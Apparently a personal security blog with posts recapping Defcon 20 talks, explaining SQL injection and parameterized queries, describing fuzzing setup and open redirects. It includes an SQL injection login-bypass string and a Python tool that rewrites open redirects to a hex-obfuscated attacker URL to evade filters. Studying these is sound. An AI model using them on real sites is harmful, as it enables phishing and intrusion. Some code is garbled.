lavamunky security blog
...let's see how deep the rabbit hole goes
Thursday 9 August 2012
Defcon 20 - Thoughts on 10 days in Vegas or at least what I can remember of it. Part 3
This is the third part of a series of my first time to Las Vegas and defcon. If you missed either of the first two, you can find part 1 here, and part 2 here and as this is the third part, I'm going to be discussing the talks from the Sunday, the last day of defcon. We start from the start of Sunday..
..Feeling pretty refreshed surprisingly, and there's some interesting talks on in the morning, but it's mainly the ones in the afternoon I'm looking forward to..
We have you by the gadgets by Mickey Shkatov, Toby Kohlenberg
I actually saw this talk at blackhat (the slides can be found here), so I'm presuming the content is identical, but I quite liked this talk, and there had been a bit of buzz around it as Microsoft had officially told the public to completely turn off Windows sidebar gadgets due to the research done for this presentation. Mickey and Toby started off the talk by going over what gadgets are, and despite their decline in use, the point of why this actually matters is due to the fact this style of application development is taking off in a big way, especially within the phone applications market.
They also realised looking at gadgets that in fact they are simply zip files which with contain a regular webapp made out of HTML, CSS and javascript, or made out of silverlight (although though out of the apps they tested they admitted finding very few applications made from silverlight).
It also seems partly surprisingly that Microsoft have a fairly standard security model, and even have guides to help with secure development of gadgets but despite this, for the most part they are actually very insecure programs. After this they went through their two main attack scenarios:
-Attacking with gadgets, and
-attacking gadgets themselves.
So for attacking with gadgets, was a fairly simple malware attack, getting somebody to install their gadget, and people are perhaps slightly more trusting as they don't see them as proper programs, but in the end you can still execute code, and along with this was a demo, also showing the fact that they share the cache and so see all the cookies etc from a person's browser.
As for attacking gadgets themselves, they found that a lot of places where they tried to download gadgets, it was often malware hiding as gadgets in the first place, but then there was a lot of shared code, which was made with poor security practices and in the end were fairly trivial to break. One simple way was the fact that very few gadgets would download updates over SSL, making it very easy to setup a proxy and inject whatever malicious code you want.
In conclusion, I thought this presentation was quite good and it came with a couple of funny demos, but it was just astonishing that so many applications were written so poorly and so vulnerable to attack, although they did point out that the gadgets written by Microsoft themselves seemed very secure and were all written in silverlight.
Owning the network: adventures in router rootkits by Michael Coppola
This talk was yet again something quite lot down, although not quite hardware hacking this was looking at the software on the routers themselves. Because the majority of the routers out there run on a version of linux, they have to be opensource and it turns out the vast majority are running on linux kernel version 2.4 to 2.6, the versions of which were released a long time ago and so are bound to have holes in, but nonetheless we weren't really looking at that. I'll note however what was quite good to see was that asking the vendor can sometimes help, as part of the source (their customised version of unsquashfs) was missing and after discussing with the vendor for a couple of weeks, Michael finally received an email with a download for the last piece of software he needed to finish looking over the OS and patches. But the main part of this was to do with creating rootkits within the router and after going through making one, he went through the Router Post-Exploitation Framework (RPEF) he had created in
order to basically automate this for other images. It would allow you to create a rootkit with an exploit of choice, add it to an image and flash the image onto the router to pwn it whenever you want.
In conclusion though, I quite liked this talk. I admit I don't know much about rootkits but it was an interesting topic and I'm sure I'll be looking further into them in the future, plus the framework along with slides can be found on Michael's website: http://www.poppopret.org/.
..That was another great talk, although considering this track seems like it has twice the amount of people in it can actually hold, and everyone wants to see the next talk too. Ruh-roh...
Hacking [redacted] routers by FX, Greg
I've got to start off this by saying this was a shocker, partly because of the presentation and partly because of the audience. This was an hour long talk, but was put into track 4 (the smallest), and after waiting in a couple of hundred metre line for the talk before, everyone in the room still wanted to see this talk, along with the 500 or so waiting outside. But the goons were excellent and realised halfway through the talk before that there was a serious problem with spacing, so stopped everyone passing in the hallway so that a couple of thousand people could go from track 4 to track 1, which was no mean feat and they pretty much made it go off without a hitch.
But anyway, back to the talk, it was really good, and if you haven't already heard (it's been all over the infosec news) [redacted] is actually referring to Huawei. So FX started off by going through who the company are and their line of products and how huge they are over the entire world, and since their Chinese based, there have been a lot of controversy around them as certain countries have been unwilling or even slightly scared of their products being backdoored, allowing people in the Chinese government easy access. However, they also went over the strange fact that they appear to have no way of disclosing vulnerabilities to them 'responsibly' and it seems difficult to get into any sort of contact with a security department or person within the company, and any security updates they may have to their software are not marked as such, so the way they go about things is a bit odd to start off with.
After this FX went onto the VRP (Versatile Routing Platform), which is the software platform used on data communication products of the vendor, and went through a few versions of these and some problems with these even before trying to attack the machines, and went through some of the features of the VRP. After this he also went through information about the images, and the default services, which stupidly being able to turn off the standard services is a new feature and can't be done on older routers.
Then FX got to code quality and the lack there of, and it was just shocking some of the code decisions, such as 1 image calls sprintf 10,730 times, and another calls it 16,420 times, and there were often reimplementations of commonly flagged functions such as memcpy, strcpy, strnstr, etc, and then the NULL-Page is RWX mapped and their SSH server is a complete rewrite which even fails poorly.But now down to looking at the Web UI for a change (which only works in Internet Explorer), which uses a poorly designed Session-ID which is easy to spoof making logging in trivial (they showed a small perl script which could create the session-ID). Slide after slide brought more insecurities to the hardware, including easy to find buffer overflows.
After the buffer overflow though, Greg came on and started talking about the heap, as they found a fairly straightforward heap overflow coming from a the BIMS client function which parses an HTTP response. And Greg went through in great detail how to exploit the vulnerability, but their conclusion was simple, that the routers have 90's style bugs, which require 90's style exploitation, as there are no OS hardening, along with no security advisories and not even any security releases, and that they didn't appear to have any backdoors, but there are so many holes in the routers that there doesn't need to be and at least they could have plausible deniability by just claiming that it was insecurely written.
In my conclusion though, this was a really fun talk, getting down to software bugs and exploitation, showing Huawei routers may be scary, but not because of backdoors, just because of their plain lack of security. To see the slides to this excellent talk, they can be found on the phenoelit website here: http://phenoelit.org/stuff/Huawei_DEFCON_XX.pdf
..Wow, people actually worry about China backdooring products? Seems you should be more worried about people hacking your router from outside in their car rather than the Chinese government. Anyway, I like games so lets see about hacking them...
Fuzzing online games by Elie Bursztein, Patrick Samy
This was an interesting talk and something a bit different from the norm. It basically went over how they fuzzed the online elements to two example games, Diablo III and League of Legends. Basically even with these two games, security measurements to stop people even trying to fuzz them are wildly different and Elie and Patrick went through how they went about reverse engineering, and fuzzing the online parts to the game along with the difficulties they had and how they managed to get around them.
It was fairly interesting but it was very specific to the particular games and although it was funny in parts it just seemed a little lacking in something. I know these aren't very constructive comments but it just didn't seem to have anything that seemed particularly new, it was just the fact that it was a game instead of a 'normal' program.
..Hmm mixed feelings about that talk, but I better get to the next talk quick as it looks like it will be completely packed. Should be interesting..
Owned in 60 seconds: from network guest to Windows domain admin by Zack Fasel
Zack was a new talker at defcon but apart from failing at demoing (much drinking was done as punishment), I thought this was a really good talk. It was a talk on SMB and particularly on about NTLM, and NTLM relaying (not passing the hash), and how he could basically own pretty much anything with it. Now I didn't take notes during this talk (my bad), and Zack's slides are nowhere to be found at the moment (they're not online yet and the disk says the URL they will be at when online) so this post may require an update at some point as I'm trying to remember all of this from the top of my head. He went over NTLM, the different versions and things wrong with them, basically going over things which had been discussed at other points, but his point was that this has been going on for so long and it really should be solved by now. So after the success firesheep, showing it can be really easy to hijack an HTTP session, Zack wanted to create a tool, ZackAttack which showed the ease with which you could relay hashes and
completely own an entire network let alone a single person's account and although his demo didn't work (cue drinking), he still went through some of the tool showing how it would work and it honestly looked like a really slick tool and something which could be used by somebody who barely knows what they're doing. It may be quite a good tool to show along with a pentesting report to companies to show just how easy it is to do this, in the same way armitage can show the layman how easy it can be to hack computers.
In conclusion, it was a shame the demo didn't really work but it was a good talk nonetheless and I would definitely like to see Zack back at defcon speaking again.
Notable other talks I didn't get to see but wanted to:
-SIGINT and Traffic Analysis for the Rest of Us
-No More Hooks: Trustworthy Detection of Code Integrity Attacks
-Post Metasploitation: Improving Accuracy and Efficiency in Post Exploitation Using the Metasploit Framework
-Looking into the Eye of the Meter
-Can Twitter Really Help Expose Psychopath Killers' Traits?
-SQL Injection to MIPS Overflows: Rooting SOHO Routers
-Hacking the GoogleTV
-bbqSQL: Blind SQLi Exploitation
-How to Hack All the Transport Networks of a Country
So that was it for my talks at defcon, now I'm only including the official talks here and not the hacker pyramid, or any of the parties but they will probably be discussed in another post, along with any crazy experiences I can remember from my first experience of Las Vegas, but I can gladly say I had a great time. I managed to get into blackhat (I was working but I managed to get to a couple of talks), and had an awesome time at defcon and the parties around everything, plus I got to see Las Vegas for the first time. Along with all of this I managed to finally meet a lot of people I previously only knew from twitter, and met a ton of great new friends along the way (shocking news: some people working in the security industry are NOT on twitter)
But even though I had a great time, it still seems like I missed so much. I didn't get a ticket to BSidesLV, I didn't get around to going to hacker jeopardy (although I was in the 303 party at the time, which made up for it), I didn't manage to get around going to the hardware hacking village, and I spent very little time in the CTF, lockpick village and didn't get into the wireless hacking village at all. So despite the fact I had a great time, I feel I owe it to myself to go again next year, or at least that's my excuse ;)
..Now to stop drinking and go on a diet in preparation for BruCON..
Part 1 Part 2
Tuesday 7 August 2012
Defcon 20 - Thoughts on 10 days in Vegas or at least what I can remember of it. Part 2
..Head still pounding..I need coffee...guess I should go to my first talk of the day though after sleeping through..
Friday 3 August 2012
Defcon 20 - Thoughts on 10 days in Vegas or at least what I can remember of it. Part 1
This was my first time to defcon and Las Vegas at all, and I really wanted to make as much effort to meet new folks, see as much of defcon as possible and see as many great talks as possible. This is the first post in a series which will cover defcon, the talks, the social aspect of it, and las vegas in general.
And although a bit belated, this post in particular is about the talks of defcon I went to on the Friday of defcon, which was the first full day. The Thursday had a few events throughout, although I wasn't able to attend these so I'll start here.
..At the Rio, have my badge and amazingly despite what I've heard, there was practically no line, except to buy the official swag. So onto my first talk of defcon..
Making Sense of static - new tools for hacking GPS by Fergus Noble and Colin Beighley
This was my first talk of the day, and as far as talks go this wasn't the best presentation I've ever seen. Although I first thought the idea for the talk was quite a good one, there was simply too much of going through the technical details of how GPS works, and waves and other not too interesting details. Although there was a tool introduced, very little time was actually spent on this, whereas I thought it should have been the other way around or at least near equal amounts of time. I'm not sure if both or either of the speakers were first timers, but there were a few moments of stopping and staring into space as they had forgot what they were going to say, which seemed to be due to nerves. In the end I thought the subject matter could have been interesting, and I think the information could be quite interesting but it just wasn't presented as an interesting subject, and seemed almost like a research talk instead of something where a tool was created.
..So not a great start to my defcon talks, but onto the next..
Passive bluetooth monitoring in scapy by Ryan Holeman
I thought this was quite a good talk, although at the start Ryan said he had performed this at blackhat where he had more time and so had to shorten the talk for defcon, which was a shame, but the talk was still good nonetheless [Update: Ryan contacted me on twitter and turns out I misheard and this was longer than the one at blackhat. Still, wish the talk could have been a little longer just because it was cool tool]. Ryan started by going over the subject, having an overview of bluetooth and the ubertooth board (further information about the ubertooth project can be found here) to interact with bluetooth and the scapy-btbb library he created with the simple goal to get bluetooth baseband traffic with python.
This will allow easy data analysis of btbb (bluetooth baseband) traffic, with the compatibility across hardware through using pcap files, and so can be easily integrated into tools for debugging, auditing, or exploitation, whichever is your inclination.
Now I haven't used the library myself, but Ryan went through a couple of demos and it generally seemed like it has at least the basic functionality that would be wanted: reading btbb packets from a pcap, seeing all the information to do with the bluetooth packets, writing btbb pcap files, and streaming btbb packets. Basically everything that seems would be needed for integrating into debuging, auditing or exploitation.
He has also added some handy functionality to the library as well, the part I particularly noted liking was the fact you can get the vendor name. This is because as Ryan noted, it can be difficult keeping tracking of multiple bluetooth signals and a name is generally easier to keep track off than a MAC address.
..So getting warmer. What next?
Don't stand so close to me: an analysis of the NFC attack surface by Charlie Miller
Ok now this is the kind of talk I wanted to see while at defcon. Charlie actually did this talk at blackhat as well, so as of the time of writing the slides can be found here.
It turns out this started off when the speaker was having a conversation with Moxie Marlinspike, who happened to tell him the NFC stack was poorly designed, and so this is what got Charlie interested in the subject, but anyway, back to the presentation. Charlie started off as you would think, going over the NFC protocol, and as he realised, despite such a small amount of bytes being sent, the protocol is actually quite complex, and that there are two different ways an NFC communication can take place, either
-there is an initiator and a target e.g. a NFC-enabled phone and an NFC tag, or
-it can be done peer-to-peer, which needs two devices which are powered e.g. two different NFC-enabled phones.
After this he actually went into far greater detail than I am going to here, but this can basically seen from the paper I've linked to above, along with example data to give you an idea of what's happening. Now we're finally onto the interesting part that people want to hear about though -- fuzzing of the NFC stack (or is that just me?). This was particularly interesting for me, and he went through his setup, including what hardware was used for emulating a passive tag, and how he fuzzed so that he basically wouldn't have to sit there manually placing the phone near an emulator and taking it away again (especially in fuzzing terms, due to the cases often ranging in the thousands, or tens of thousands, manual=bad and automated=good. For an overview on fuzzing you can see a previous post about it here). I thought it was interesting to note that as Charlie was fuzzing wildly different sections, he used both generation and mutation based fuzzing, and he went through what was fuzzed in which way for each platform tested on, and some results which at face value seem to be not that interesting.
However the talk became most interesting when you delve into what the phone does with the data it receives, rather than if there are issues parsing it, so when you look into this, the attack surface for NFC gets blown wide open as for starters with android, you can get people to visit a website in the browser with NO USER INTERACTION. As you can imagine, by the amount of different fileformats with web browsers, and possible plugins this has all of a sudden changed to an enormous attack surface instead of just being parts from the NFC stack. There are some caveats depending on the platform being used, but Charlie generally went through these and possible workarounds. And with these came the real crowd pleasers: the demos. Charlie had multiple demos showing different attack scenarios, all leading to full exploitation of the other person's phone and in general it seemed although there was a bug found in Android 2.3 (although fixed in a later version, the vast majority of android phones use 2.3 or lower), the major problem with NFC is what's done with the data. As NFC in itself isn't too insecure, the fact is the platforms just give the information straight out to another application without a second thought.
..This is going pretty well. What else could there be going on?
Bypassing Endpoint security for $20 or less by Phil Polstra
With this talk I really didn't know what to expect, and I'll fully take the blame for that as I didn't read further information about the presentation. Basically this is about endpoint security of USB sticks, so basically a way to get around when only certain USB sticks are allowed to connect to a machine (filtered by their VID/PID -- the equivalent of MAC filtering in networking), you can still have any USB connect to the machine and mount successfully and cheaply. Phil Polstra initially went through the hardware and software in use and how the parts communicate with each other in detail (some C knowledge is advised) particularly with mass storage devices (like USB sticks), then we got down to the interesting part and what needs to be done. Basically we'll be using a microcontroller as a proxy between the USB stick and the computer, except it will change the VID to a valid one, effectively spoofing it. Phil went through the particular chip choices and detailed information about them, and then implementations, either to do one of two things: use a known valid VID to impersonate, or brute force finding a valid VID. Luckily Phil has also done a lot of the hard work and has created a list of the most common VIDs [update: Phil has told me he didn't create the list, but found somebody who maintained a list. This is attributed in the code, which can be found here], and then in the chance a valid VID isn't in this list then it will manually brute force through every possible iteration. Plus as a nice addition of a demo showed the bypass in action.
I do wish in hindsight, I knew more about microcontrollers as I feel if I knew more about this or hardware hacking in general, I would've enjoyed the talk more, but still the talk had many interesting and funny moments and opened my eyes up a bit to the hardware side of hacking.
..That was a bit enlightening. Is there anything going on in the last talk of the day?
Anti-Forensics and Anti-Anti-Forensics: Attacks mitigating techniques for digital-forensic investigation by Michael Perklin
I'll fully admit, I know practically nothing about computer forensics, but I thought seeing as I'm at my first defcon, and I had just learnt something interesting about an area of security I knew nothing about (hardware), that I would try something else I knew absolutely nothing about. So onto the talk, Michael Perklin made this a funny talk, mostly coming down to his constant drinking whenever he forgot to mention his running total (which I'll get onto later).
Michael went through the methodologies taken by forensic investigators and the general workflow used. What I found particularly interesting was he continuously made it clear that it isn't about stopping the forensic investigator (which they can be stopped in a few simple ways -- for example destruction of the physical media) but mitigation of the forensic investigator trying to find information (as shown in the title). Basically the more time it takes, the more money it takes and therefore the bigger likelihood that the prosecutor will just want to settle out of court or stop the trial altogether. He quite cleverly kept this as a running total in each corner of hours and cost, of which every time he forgot to mention that the cost went up, he would need to take a drink.
Notable talks I didn't get to see (but wanted to):
-welcome & badge talk
-APK File infection on an Android System
-Owning one to rule them allow
-drones!
-NFC hacking: the easy way
-detecting reflective injection
-how to hack vmware vcenter server in 60 seconds
-new techniques in SQLi
-post-exploitation nirvana: Launching OpenDLP agents over Meterpreter sessions
-The art of the con
-safes and containers - insecurity design excellence
-blind xss
Sunday 20 November 2011
Why parameterized queries stop SQL injection attacks
An updated version of this article can be found here (How do prepared statements protect against SQL Injection?)
I've recently got a new job, and as such was having to go through a lot of documentation, and 'recommended reading' (which I actually read because I had so much free time), but one of the many things was various type of vulnerabilities and how they work, and surprisingly they told you various ways to actually help against these attacks.
Now, the other day I was down the pub, talking with a friend who has recently got a developer job (we're both just out of university, thus many people I know either have just got a job, or will be hopefully in the near future), and he didn't understand about parameterized queries, and how they actually stopped SQL attacks. Now this I found totally understandable, as when articles talk about parameterized queries stopping SQL attacks they don't really explain why, it's often a case of "It does, so don't ask why" -- possibly because they don't know themselves. A sure sign of a bad educator is one that can't admit they don't know something. But I digress.
When I say I found it totally understandable to be confused is simple. Imagine a dynamic SQL query
sqlQuery='SELECT * FROM custTable WHERE User=' + Username + ' AND Pass=' + password
so a simple sql injection would be just to put the Username in as ' OR 1=1--
This would effectively make the sql query:
sqlQuery='SELECT * FROM custTable WHERE User='' OR 1=1-- ' AND PASS=' + password
This says select all customers where they're username is blank ('') or 1=1, which is a boolean, equating to true. Then it uses -- to comment out the rest of the query. So this will just print out all the customer table, or do whatever you want with it, if logging in, it will log in with the first user's privileges, which can often be the administrator.
Now parameterized queries do it differently, with code like:
sqlQuery='SELECT * FROM custTable WHERE User=? AND Pass=?'
parameters.add("User", username)
parameters.add("Pass", password)
where username and password are variables pointing to the associated inputted username and password
Now at this point, you may be thinking, this doesn't change anything at all. Surely you could still just put into the username field something like Nobody OR 1=1'--, effectively making the query:
sqlQuery='SELECT * FROM custTable WHERE User=Nobody OR 1=1'-- AND Pass=?'
And this would seem like a valid argument. But, you would be wrong.
The way parameterized queries work, is that the sqlQuery is sent as a query, and the database knows exactly what this query will do, and only then will it insert the username and passwords merely as values. This means they cannot effect the query, because the database already knows what the query will do. So in this case it would look for a username of "Nobody OR 1=1'--" and a blank password, which should come up false.
This isn't a complete solution though, and input validation will still need to be done, since this won't effect other problems, such as XSS attacks, as you could still put javascript into the database. Then if this is read out onto a page, it would display it as normal javascript, depending on any output validation. So really the best thing to do is still use input validation, but using parameterized queries or stored procedures to stop any SQL attacks.
Monday 12 September 2011
Annoying geeks...a World of Warcraft DoS & security of tokens
Note: this is a post saying how this is possible, not indicating that you should do so. And it's not permanent, it will just make them hate you until it's fixed.
So I noticed about a year or so ago that a friend of mine, who plays World of Warcraft, uses a token device, called "The Blizzard Authenticator", more information can be found here
It generates a 6 digit numeric code that has to be inputted along with the username and password of the user. One simple way to effectively DoS the user is to simply steal the keychain, whereas a smarter way, which will probably make them think that something's wrong with the token, and probably spend lots of time trying to fix it, is simply by pressing the button around 10 times or so.
Since tokens generate a (pseudo-)random number, it means that hitting the button enough times will make the device show every code in the whole keyspace of 000000-999999. And because of this, technically every number is a valid number, but if it just took every 6 digit number as correct, it would give no added security. The way they get around this is have a Window of Acceptance. They take the last 6-digit code used in the user's last successful login, and do the random function on it (the same one used by the token device to bring out the next code), this should give the next code, however this also means there is only a window of acceptance of one code, which is pretty ridiculous as it means if you accidentally press the button twice, you've wasted all your money on a token. So they have a window of acceptance that's larger, perhaps 5 or 10. So they do this function on each subsequent result, and have a list of codes that can be accepted.
World of Warcraft isn't the only application of tokens, the reason I used WoW for this blog post is partly because I know somebody that uses one of the devices, and partly because of what one has to do to fix it. On the WoW wiki, it shows that if your token breaks, you need to contact the World of Warcraft billing department with the following information:
- Your full real name.
- Your full address including postal or zip code.
- Your full email address (currently registered on the account).
- Your account name.
- The authentication key used to create the account.
- Your Secret question and answer.
- The last 4 digits of the credit card used on the account plus the expiration date OR the full code of a game card activated on the account.
- A legible fax, scan or photo of a piece of government-issued photo identification, such as a passport or driving license matching the first and last name of the registered account owner. (No idea if this is kept on record but I sure hope not)
- A legible fax, scan or photo of the Authenticator token, with the code on the back fully visible.
This is an immense amount of security for a game (perhaps even too much). I'm really impressed as there are banks with less security than this (probably because sending photos of ID and the broken token would take so long)
So in the end, if you know somebody who plays WoW, and they use a token device, don't go around pressing the token device 10 or 20 times (or giving them to small children who will just do the same). Or if you do, expect them to be annoyed until they manage to get it reset, which judging by how much information they need to give, may take a while.
p.s. I don't play World of Warcraft, I'm not a fan, but I think Blizzard are doing a decent job to make people feel protected against others stealing their account, and in the end, I feel tokens are a good idea.
Tuesday 28 June 2011
Get your fuzzers ready...
What I have really been doing though is focussing on fuzzing, the theory behind it, and setting up my home lab for both bug hunting and general trying to get better at pentesting. The idea of fuzzing and bug hunting is really interesting to me, since there are practically unlimited different ways to try to break a program.
It's the same idea as for all security -- an attacker has to only find one way to get in, a defender has to attempt to stop every single possibility, and you could use the same thing with a security-minded programmer versus a bug hunter.
But back to fuzzing in particular, in case you don't know the basic techniques of fuzzing, there are two main ones -- mutation-based and generation-based.
Generation is a much more comprehensive type of fuzzing, since input is generated and can be made as such that is tests every known feature of a program. The major flaw with this technique (and the main reason it's not used as much as the other) is purely time. It could be deemed it is also down to knowledge, but I am putting knowledge in with time. The reason so much time is taken up by building a generation-based fuzzer is that in order to generate the data, you need to know how the data was constructed. Now with simple protocols and filetypes this isn't such a bad thing, as there may not be a lot to learn and generate data, but with proprietary protocols and stuff that hasn't been well documented/reverse engineered, this becomes a major problem. It may be that you create a fuzzer, spending months reverse engineering the protocol and making the best fuzzer possible, just to find out that there were no problems with the particular program (or at least none your fuzzer could find). It is seen that since generation-based fuzzers are specific, they will make good overtime, since if testing many different programs you just need the one fuzzer and it can test all of them for a specific file format or protocol.
However, the startup cost is usually so great that it is often easier to just use mutation-based fuzzing instead. With this technique the tester takes sample data, changes it, and feeds it into the program being tested. The only problem is that this techniques will not get past security measures (you're pretty screwed against encrypted traffic) and checksums or anything calculated on parts of the data.
Luckily, there are 2 compromises:
--find out some of the protocol/file type
--Mutate a lot of files
You may think that finding out about the protocol/file type is the same as generation fuzzing, but this is meant to be used with mutation-based fuzzing. And you may also be wondering that if you're already going this far, why not just go and build a generation fuzzer?
This is a valid point, however, this way you need to know a lot less. For example, you are reverse engineering a proprietary filetype, you've spent days trying to find out what a particular section of 10 bytes is for. If you're making a generation fuzzer, you will have to keep on getting other files and trying to reverse these, so that you can do the correct generation on files, but if you're doing mutation-based fuzzing you can either say just fuzz it, or leave it as static. The bare minimum need to know for this type of fuzzing is checking what stays the same in each sample, and what is different. Then you can say "fuzz it" or "it's static, don't fuzz it". Of course the further into the protocol/file type you get the better results can be obtained, however there are programs that can try to do this for you (I haven't personally researched them but there may be a blog post coming up about them at a later date). Another advantage of using this is that if there is a checksum or hash that needs to be done, this technique can do these. If these are not done it is likely that the data will just be rejected, effectively losing a potentially huge chunk that cannot be tested with normal mutation-based fuzzing.
Mutating a lot of files basically gives the effect that it will go through a lot more branches of the execution of code, and you will get much better code coverage ((a program could potentially be used for this). This is a technique that has been covered well by Charlie Miller here. The techniques will most likely give a compromise between amount of time spent and problems found. Similar to the technique above there is a lot of startup time used for it, with collecting samples, making them into an easy form to fuzz, and fuzzing them will take a long time since there is a lot of documents (in the slides above Charlie Miller says it would take around 3-5 weeks to fuzz using his own code running in parallel on 1-5 systems at a time). However, this is still often shorter than the amount of time it would make to create a generation fuzzer for a proprietary file format or protocol.
I have personally spent some time setting up machines for doing fuzzing the latter way. And here is some problems and solutions I have found thus far:
(note I have created scripts for many of these jobs, which I am not stating to use, since in some cases they may possible go against websites' Terms of Uses)
So I decided I would start off on my desktop fuzzing PDF software so I first started investigating what to fuzz that actually uses PDFs. This isn't just Adobe PDF reader. There are different viewers, editors, converters, creators and other things applications can do with PDFs. A decent list (with specific platforms) can be found on wikipedia at http://en.wikipedia.org/wiki/List_of_PDF_software, however this isn't a complete list, and I'm pretty sure the list doesn't include any web browser plugins.
So now I have a list of possible software - what am I going to fuzz and what platform am I going to use?
Well I decided since I know best about Linux and Windows I would use these (I do have the possibility of testing Mac software, but I don't want to fuck up my mac and as far as I know it's still not really possible to put OSX in a VM without hacks).
Since I have a desktop able to stay on all night and day fuzzing these (core i5 with 12Gb DDR3) I have installed VMware workstation and will install a few VMs of each, with exactly the same environments since workstation is able to clone virtual machines.
For downloading files from the internet, I created a script that simple downloaded them from Google. Since I couldn't be bothered to try and find out how to look through each page in a search result I just put in another number with the filetype in each search. It isn't the best working script every, and won't find every possible pdf in the results, as I had to make a compromise between how long I wanted it to take and what strings the regex would find. This is because when adding even more possibilities in regex it made it grow rapidly in time. I believe I found a decent compromise and have put it here. As I noted before, Google may have something against scripting in its Terms of Service and as such this should not be used, plus there is limit of around 650 for the reason that Google brings up a Captcha. (And if you can script your way around a captcha you need a medal) If you wish to download more, it could be tried at different IPs (how I imagine it determines scripting) or just wait the required time, which I believe to be around 30-60 minutes.
Note as well that the second part of downloading the files actually was taking a very long time, and as such I made a script of just this part so that I could make it run on several different machines which sped the download up considerably.
This is that script:
This was just used by splitting up the list in the textfile created in the first script and using it on different VMs.
Once this was done I decided I wanted to give all the files a generic name, as I would be making lots of different slightly different copies of each file. So for this I created (yet another) script so that all the files would be named A.pdf, B.pdf, C.pdf .. AA.pdf, AB.pdf....
This was going to be used with upper and lower case arguments, however after 2 hours of frustration I remembered the fact its a case insensitive drive (damn Macs!!) and therefore ab.pdf is the same as AB.pdf (on the drive not in the terminal before anyone tries to argue with me).
Anyway, this script is really bad and I'm sure there's a better way to increment a letter after Z using mod, but I couldn't figure out and was tired, so here's my script for this part too:
newFile = array[index] + '.' + argv[2]
elif index<(len(array)**2):
firstLetter=array[index/len(array)]
secondPart=index%(len(array))
secondLetter=array[secondPart]
newFile = firstLetter + secondLetter + '.' + argv[2]
elif index<(len(array)**3):
firstPart=index/(len(array)**2)
firstLetter=array[firstPart]
secondPart=index%(len(array)**2)
secondLetter=array[secondPart/len(array)]
thirdPart=secondPart%(len(array))
thirdLetter=array[thirdPart]
newFile = firstLetter + secondLetter + thirdLetter + '.' + argv[2]
else:
continue
cmd='mv ' + argv[1] + i + ' ' + argv[1] + newFile
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
but I don't care, I'm giving it away on a blog for crying out loud).
If you want you can fuzz any way you want. You may want to use the '5 lines of python' that Charlie Miller swears by (which was actually about 20-35 lines when I managed to get it into a python program -- this is actually still fairly small but it's only for generating the fuzzed files). I suggest if doing it this last way, one way to test the fuzzed files if on windows would be to use FileFuzz http://fuzzing.org/wp-content/FileFuzz.zip It's not amazing, but I can't see any reason why you couldn't put a lot of fuzzed files into a directory and tell it to use them, I'm just not sure exactly what FileFuzz has checks for, and some trial and error testing may be needed done a sample at a time in order to get the time needed per test down properly.
Anyway I hope if you try to do any fuzzing that this gives you some help on the basics, and ways you could go about it.
--lavamunky
Sunday 27 March 2011
The power of redirection
http://dw.com.com/redir?edId=3&siteId=4&oId=1770-5_1-0&ontId=5_1&spi=8caeb9bceb2ff504061831b7a696ddde&lop=link<ype=dl_dlnow&pid=11355671&mfgId=50119&merId=50119&pguid=V95vrAoOYJAAABI7QlIAAABo&ttag=tdw_dltext;&destUrl=http%3A%2F%2Fwww.microsoft.com%2Fwindows%2Fwindows-7%2Fdownload.aspx
And clicking on
http://dw.com.com/redir?edId=3&siteId=4&oId=1770-5_1-0&ontId=5_1&spi=8caeb9bceb2ff504061831b7a696ddde&lop=link<ype=dl_dlnow&pid=11355671&mfgId=50119&merId=50119&pguid=V95vrAoOYJAAABI7QlIAAABo&ttag=tdw_dltext;&destUrl=%68%74%74%70%3a%2f%2f%77%77%77%2e%6c%61%76%61%6d%75%6e%6b%79%2e%63%6f%6d
It’s surprising that spammers have not considered this method. If a mail server checks the content of emails for links of black listed websites, a redirection could get around this, especially if obfuscated in such a way as above.
This is a hacker’s dream. People go onto a legitimate website that they’ve used hundreds of times before, they click on a link for, say Windows 7 SP1 (as is the one above), and a link that should take them to the Microsoft website instead takes them to a malicious website that contains malware that uses vulnerabilities fixed with SP1 (unlike the one above, promise ;) ).
Especially in recent times, with such huge catastrophes happening around the world, people are a bit wary, and want to give money. This is a huge opportunity for attackers, and as such large websites, especially those that are foundations taking people’s donations need to make sure that there aren’t redirects on their websites.
To show the ease of taking a normal page, finding redirects and exploiting them I have written this tool in Python:
(Note: This tool is for education purposes only. The author does not take any responsibility for any damage caused and does not condone this being used for illegal purposes.)
#!/usr/bin/python
from sys import exit, argv
import re
from optparse import OptionParser
defaultUsage = 'usage: %prog
parser = OptionParser(usage=defaultUsage)
parser.add_option('-f', '--file', action="store", type="string", dest="file", help="File for searching for redirects")
parser.add_option('-u', '--url', action="store", type="string", dest="url", help="A URL to replace the redirect, e.g. www.lavamunky.com")
parser.add_option('-o', '--obfuscate', action="store_true", dest="obfuscate", help="Obfuscate a URL by converting to hex then URL encode. Note: -u option also needed.\nE.g. http://www.lavamunky.com becomes \nhttp%3A%2F%2F%77%77%77%2E%6C%61%76%61%6D%75%6E%6B%79%2E%63%6F%6D%2F")
(options, args) = parser.parse_args()
separator = '---------------------------------------------------------------------------\n\n'
if not (options.file):
print defaultUsage
exit(1)
filename = options.file
file = open(filename, 'r')
text = file.read()
urlPattern = 'http((\:\/\/)|(\%3A\%2F\%2F))\w*[.\w]+[\/\?+\=+\&+\%+\.+\;+\-+\_+\++\w+]*\"'
redir = 'http((\:\/\/)|(\%3A\%2F\%2F))\S*redir\S*\='+urlPattern #won't match all redirects but is good enough for my needs
match = re.findall(r'('+redir+')', text)
if not match:
print "No redirects found!"
exit(1)
uniqueMatch = []
for elem in match:
if elem not in uniqueMatch:
uniqueMatch.append(elem)
if options.obfuscate:
if not options.url:
print "A url is needed with -u in order to obfuscate"
exit(1)
if (options.url):
url = options.url
if url[:4]!='http':
url = 'http://'+url
if options.obfuscate: #convert to hex then effectively url encode, so A becomes %41 etc
url = url.encode('hex')
tempList = list(url)
i = 0
j = len(tempList)
while (i < j): tempList.insert(i, '%') i+=3 j = len(tempList) url = ''.join(tempList) for elem in uniqueMatch: original = elem[0] + '\n\nbecomes:\n\n' print original replaced = re.sub(r'\='+urlPattern, '='+url, elem[0]) #replace the strings
print replaced+'\n\n'
print separator #just presents it in a easy to read way
else:
for elem in uniqueMatch:
print elem[0] + '\n'
redirects = len(uniqueMatch)
if redirects!=0:
print str(redirects) + ' redirects found\n' #tells you how many found for good measure
I originally wanted to create a proxy server, which would then find all the redirects as a surfed the Internet, however I wanted something I could create in a couple of hours.
This program takes in a file such as the source code from a webpage with the -f option and prints out the redirects. If you specify -u you can specify a URL you want changed into the redirect, and -o to then obfuscate this.
To test this out you can use the source from the web page:
